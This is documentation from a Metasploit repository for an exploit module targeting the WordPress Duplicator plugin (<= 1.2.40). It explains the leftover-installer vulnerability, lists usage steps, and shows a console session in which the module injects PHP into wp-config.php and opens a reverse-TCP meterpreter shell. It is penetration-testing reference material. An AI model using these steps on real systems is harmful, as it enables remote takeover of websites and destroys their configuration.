adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2b61c4e118a5286bf6518bd1879e5869f6ad884d
metasploit-gs/documentation/modules/exploit/multi/php/wordpress_duplicator.md
T
Julien Legras 2b61c4e118 Fixes for PR
2018-11-29 15:02:03 +01:00

2.6 KiB
Raw Blame History

Duplicator by Snap Creek is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:

  • An ZIP archive with the complete WordPress files and Duplicator specific files:
    • A copy of the installer.php script: installer-backup.php
    • A SQL script that will be used to restore the database content: database.sql
  • An installer PHP script to restore the archive installer.php

When the installer.php completes its process, the following files remain in the directory and has to be manually deleted:

  • The ZIP archive
  • database.sql
  • installer-backup.php
  • installer-data.sql
  • installer-log.txt
  • installer.php

WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the Wordpress instance.

Vulnerable application

Install a vulnerable version of WordPress Duplicator (<= 1.2.40) and create a backup. Put the install.php and archive files on a clean web server.

Verification Steps

Confirm that functionality works:

  1. Start msfconsole
  2. use exploit/multi/php/wordpress_duplicator-
  3. Set the RHOST.
  4. Confirm the target is vulnerable: check
  5. Confirm that the target is vulnerable: The target is vulnerable.
  6. Set a payload: set PAYLOAD php/meterpreter/reverse_tcp
  7. Set LHOST and LPORT
  8. Run the exploit: run
  9. Confirm you have now a meterpreter session

Options

TARGETURI

The path to the installer.php file to exploit By default, the path is /installer.php.

Scenarios

Debian 9 running Wordpress 4.9.8 with Duplicator 1.2.40

msf5 > use exploit/multi/php/wordpress_duplicator 
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 1.1.1.1

meterpreter > sysinfo 
Computer    : debian
OS          : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
Reference in New Issue View Git Blame Copy Permalink